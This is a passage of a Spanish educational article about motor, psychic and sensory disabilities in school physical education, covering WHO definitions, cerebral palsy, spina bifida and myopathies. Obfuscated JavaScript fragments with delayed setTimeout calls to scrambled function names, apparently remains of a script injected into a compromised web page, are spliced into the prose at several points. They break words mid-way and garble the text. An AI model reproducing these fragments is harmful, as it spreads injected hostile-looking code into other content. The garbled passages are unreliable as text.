MINUSVALÍAS MOTORAS, PSÍQUICAS Y SENSORIALES EN EL DESARROLLO CURRICULAR DE LA EDUCACIÓN FÍSICA

Autor: Ángel Pinilla Torres

INTRODUCCIÓN

          En las Leyes educativas actuales de nuestro país se plantean una serie de retos, algunos ya bastante desarrollados y avanzados, como es la integración escolar de alumnos /as con necesidades específicas de apoyo educativo.

          Las experiencias obtenidas con la integración escolar de este tipo de alumnado en el sistema ordinario han puesto de manifiesto el correcto enfoque psicopedagógico que se le viene dandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando desde las administraciones públicas al tratamiento de las necesidades educativas especiales en la escuela del siglo XXI.

          En este artículo se pretende dar a conocer las diferentes minusvalías que nos podemos encontrar en un centro escolar hoy en día, con especial mención a las minusvalías que influyen directamente en el normal desarrollo de la sesión de Educación Física escolar.

 


1.- ACLARACIÓN CONCEPTUAL

          Antes de profundizar en todas y cada una de las minusvalías, es conveniente realizar una aclaración terminológica tomandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando como referencia las aportaciones teóricas de la Organización Mundial de la Salud (OMS)

  • Deficiencia: es toda pérdida o anormalidad de una estructura o función psicológica, fisiológica o anatómica”.
  • Discapacidad: es toda restricción de la capacidad de realizar una actividad en la forma que se considera normal para un ser humano”.
  • Minusvalía: es una situación desventajosa para una persona, como consecuencia de una deficiencia o discapacidad, que impide o limita el desempeño de un rol que es normal en su caso”.

          Las Minusvalías las podemos clasificar en tres tipos: Motoras, Psíquicas y sensoriales. Dentro de estos tres grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes grupos, existen multitud de deficiencias y patologías, pero debido a su enorme complejidad y extensión, solo nos centraremos en las características generales de los distintos tipos y grados de minusvalías que están más relacionadas con la actividad física, y más concretamente aquellas que nos podemos encontrar en el ámbito escolar.


2.- MINUSVALÍAS MOTORAS

          Según la OMS, “las Minusvalías Motoras son todas las alteraciones o deficiencias orgánicas del aparato locomotor o de su funcionamiento, y que afectan al Sistema Nervioso, Óseo o Muscular”.


          Las causas de este tipo de Minusvalías pueden ser 4:

- Traumatismos craneales y medulares: accidentes de tráfico, accidente laboral, etc.

- Patologías del Sistema Nervioso Periférico: por ejemplo una parálisis braquial.

- Enfermedades musculares: Miotonías, distrofias congénitas, etc.

- Malformaciones congénitas del Sistema Nervioso Central: por ejemplo la Espina Bífida.

          A continuación vamos a estudiar en profundidad las Minusvalías Motoras que nos podemos encontrar con mayor frecuencia en la escuela: la Parálisis Cerebral, las Espina Bífida y las Miotonías.

2.1.- La Parálisis Cerebral:

          Es un trastorno del control del movimiento y de la postura causada por una lesión a nivel cerebral no progresiva, producido en el niño antes, durante o después del momento del nacimiento.


CLASIFICACIÓN

* Según su ubicación:

            – Tetraplejia: afectación total de las 4 extremidades.

            – Diplejía: afectación de las 4 extremidades con predominio de extremidades inferiores.

            – Hemiplejía: afectación de un hemicuerpo o lado corporal (derecho o izquierdo).

            – Paraplejia: afectación de las extremidades inferiores.

* Según el cuadro clínico:

            – Espástica: aumento patológico del tono muscular.

            – Atetoide: movimientos involuntarios con variación del tono.

            – Atáxica: descoordinación de movimientos.

            – Hipotonía: disminución del tono muscular.

            – Distonía: fluctuación patológica del tono muscular.

2.2.- Espina Bífida:

          Es un trastorno congénito caracterizado por una falta del cierre de los arcos posteriores de las vértebras, quedandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando la médula espinal sin protección ósea.

          Esta enfermedad provoca problemas de control motor y sensibilidad, unidos a una parálisis motriz por debajo del nivel de la lesión, vinculado también a una falta de control de esfínteres, atrofias y distrofias musculares.


CLASIFICACIÓN

*Espina Bífida oculta: es una apertura en una o más de las vértebras de la columna, sin ningún daño aparente en el Sistema Nervioso ni tampoco en la médula espinal.

          Es la que más se encuentra en la escuela comúnmente, y no tiene ninguna complicación grave. Algunos casos de niños se detectan por la presencia de un pequeño lipoma, un hoyuelo, vellosidad localizada, mancha oscura o protuberancia en la zona afectada.


*Espina Bífida abierta: es el tipo más grave, ya que la apertura de los arcos vertebrales va unida a la salida de líquido cefalorraquídeo y médula espinal. Se distinguen dos tipos:

            – Meningocele: en esta variedad, se genera una bolsa meníngea que contiene líquido cefalorraquídeo. Implica secuelas menos graves, tanto en funciones motoras como urinarias.

            – Mielomeningocele: en este caso, además de líquido cefalorraquídeo, el abultamiento contiene médula espinal y raíces raquídeas. Es la afectación más grave y comporta múltiples secuelas en los aparatos locomotor, urinario y digestivo. Lógicamente estos casos no están presentes en la escuela.

2.3.- Miopatías:

           Es un estado patológico que degrada la estructura y/o funcionamiento de las fibras musculares con independencia de su inervación. Se produce una pérdida de la fuerza muscular y del control postural y de los movimientos coordinados.


CLASIFICACIÓN

            *Distrofias musculares: es un conjunto de enfermedades que afectan al tejido muscular generandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}<